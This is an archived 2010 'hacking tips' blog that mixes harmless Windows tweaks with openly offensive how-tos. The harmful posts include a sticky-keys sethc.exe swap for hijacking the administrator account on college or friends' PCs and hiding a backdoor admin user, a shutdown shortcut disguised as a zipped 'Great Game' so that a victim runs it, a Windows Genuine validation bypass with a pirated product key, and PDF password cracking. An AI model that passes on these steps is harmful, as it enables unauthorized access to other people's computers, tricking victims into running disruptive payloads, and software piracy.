Tampilkan postingan dengan label tricks. Tampilkan semua postingan
Tampilkan postingan dengan label tricks. Tampilkan semua postingan

Jumat, 17 Desember 2010

How to Disable and Re-enable USB Ports

Do you want to know how to Disable and Re-enable USB StorageDevices? It can be done through the Windows Registry.

To disable the access to USB port, in windows XP and 2000, follow the steps below
1. Click Start, and then click Run.
2. In the Open box, type regedit, and then click OK.
3. Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
4. In the right pane, double-click on Start.
5. In the Value data box, type 4, click Hexadecimal (if it is not already selected), and then click OK.
6. Quit Registry Editor.

To re-enable a disabled port, follow these steps below
1. Click Start, and then click Run.
2. In the Open box, type regedit, and then click OK.
3. Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
4. In the right pane, double-click on Start.
5. In the Value data box, type 3, click Hexadecimal (if it is not already selected), and then click OK.
6. Quit Registry Editor.





to get all latest hacking tips n tricks  directly to ur inbox

How to Block Programs or Application on Windows OS


There are several ways to block programs from being run on the windows system. We can use registry or using software blocker to block a software in windows OS. Unhappily most of the software blocker not free, we must buy a few dollars to use full version of the software. The free solution for software blocker you can use AppAdmin.
AppAdmin is free software to restrict an application from being run in windows OS. This software can be used on windows XP, Vista and Windows 7. AppAdmin no require installation because this is portable software.
What is the benefit using blocking program to block application from being run on the windows OS? If you have a small children and often use your computer or the computer used in business, and don’t want the user install the program or use a few program installed in the computer you may need software blocker.
How to Block Programs from being run using AppAdmin
  1. Download AppAdmin, you can download the software from this link: AppAdmin – Free software blocker. Extract the downloaded file and run the AppAdmin software. Appadmin-free-Software-Blocker
  2. Click the block button (with plus icon) to add the application to be blocked or you can drag and drop an application to AppAdmin.
  3. Click “Restarts Explorer” button. Once clicked the button the program in the AppAdmin list will be blocked. If there are use to run the program, the windows system will show this message. The-program-blocked
Any user cannot break the restriction although uses gpedit.msc or anything else. The program also have a password to prevent blocked programs are easily unlocked by any user.




to get all latest hacking tips n tricks  directly to ur inbox

Rabu, 08 Desember 2010

Unlock Password Protected PDF file



Nowadays PDF's(portable document format files) are most widely used format for Ebooks or related. This PDF's are some times password protected and gives access to user just to view or read, that means they will not give you the ability to copy the content like text or images. So if you want to copy the content you need password.


However there are several Portable Document files that needs password to read and get viewed. This time you will be in chain because you don’t have the password to open it.

So what to do now, don't worry guys their is an easy way to crack any password protected PDF.

There is an Online tool called unlock-pdf which unlocks any password protected PDF with in no time. This Utility is very user friendly and very straight forward.


Instructions
    ► 1. Click “Browse” and select the PDF file you would like to unlock.
    ► 2. Agree to the Terms of Service by checking the appropriate check box.
    ► 3. Click “Unlock File!” – and you’re done!

Hope this helps you. Please pass your comments.




to get all latest hacking tips n tricks  directly to ur inbox

Senin, 06 Desember 2010

Lock your PC with Pendrive


1. Download the software Blue Micro USB Flash Drive Logon.




2. Install the software on your PC and open it.

3. Insert your pendrive.

4. On the Configure Logon, type a 14 digit accesscode and your pendrive location. Then click on Create my Flash Drive Key.

5. On the enable/disable logon, enable both the entries.

6. Now whenever you start your PC, insert that pendrive, otherwise windows will not start.

hope you like the post,give ur feedback with comments


to get all latest hacking tips n tricks  directly to ur inbox

Minggu, 10 Oktober 2010

How to Run Firefox inside Firefox

How to run Firefox inside Firefox.?

Yup you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh? 
And its really easy too just type in this url in Firefox's address bar and there you go! 
Firefox inside Firefox!

copy paste following url in a web browser (mozilla firefox).


chrome://browser/content/browser.xul


Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)- 



Kamis, 07 Oktober 2010

Create your own instant Messenger Bot(yahoo,Gtalk,etc

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.
For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting.


IM Bot


If you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to www.imified.com and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";
break;
}
?>
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL

Screen Name: insecure@bot.im
Bot Script URL: http://www.insecure.in/imbot.php

Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.
For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

Hack administrators password through guest login

Learn to hack administrators password through guest login
Ever wanted to hack your college pc with guest account/student account so that you can download with full speed Hack Administrator !!!!there ? or just wanted to hack your friend’s PC to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on...

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.


Procedure To Hack windows XP administrator Password

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to 
C:/windows/system32

2.Copy cmd.exe and paste it on desktop

3.Rename 
cmd.exe to sethc.exe

4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.

6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ 
NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.

8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.

9.Congrats You have 
hacked admin through guest account.Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where "
 How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to 
registry editor and navigate to this key



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList


Here create a new "
 DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever :)Note:For the ones that are having problems with step one: What I would do because you do not have write access to the directory you can use a live version of Linux. Copy the cmd.exe to a flash drive. Boot into Linux and copy the cmd.exe to the file that needs to be replaced. In Linux you can bypass those read/write permissions.

Rabu, 06 Oktober 2010

Shutdown some ones pc While chatting on msn or yahoo

Hi friends today my post will be regarding hacking msn.The tutorial actually helps youshutdown friends computer while chatting on msn or yahoo.The tutorial actually uses a windows trick to shutdown someones computer

Method:
 
1) Right click on desktop, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" or anything of your choice

The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

After you have given it a name click on finish.
You should now have an icon on your desktop that is called "Hack msn" or whatever name you gave it.
It is also advised you change the icon to something different,So the victim fall for it.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don't forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone to shutdown their pc while chatting

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it yourself.

Ok go to start, run type cmd, then in cmd type: shutdown -a. 

How to increase your internet speed

The following post is on How to increase your internet speed,I will show you some ways to increase your net and browser speed

Go to Start>>Run and then type in “gpedit.msc” without the quotes (“)

Computer Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler.
after that, you should see something like “Limit Reservable Bandwidth”. Modify that and set it to “Disabled”, or you can put it to “Enabled” and change the value to 0.

Now this will increase your internet speed by 20%

Increase internet speed - method 2



Below combination will speed up your surfing on the net. it is amazingly fast.

Firefox + IDM + TCP Optimizer


Plz do a speed test of your net connection before & after at http://speedtest.net to know what difference this software has made.


1) Speed Up the Firefox.


just do the following.


Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests




* Alter the entries do as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30.

* Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".

Method 3

Now Download & Install IDM. ( The Best Download Manager I've ever used. )

CLick here to download


TCP OPTIMIZER DOWNLOAD



When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
In the next boxpress OK and reboot.


I have given several methods to speed up your internet,Go ahead and try and see the magic

Make windows genuine in a minute


Make your Windows XP with Service Pack 2 geniune. Im not sure if this works on SP3.

This procedure described below will allow you to bypass the Microsoft Genuine Validation.
I hope this is the best way to make your copy of windows xp geniune.

Step 1:
 Click Start and then goto run and type ‘regedit

Step 2:
Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

and double click on it. Then change some of the value data to any thing.

Step 3:

Go to start > run > “%systemroot%\system32\oobe\msoobe.exe /a” (again, dont type the quotes)

Step 4:

The activation screen will come up, click on register over telephone, then click on CHANGEPRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can download all the updates without activating, and the Genuine Microsoft Validation will irritate you No more.

Note: This works better after reformating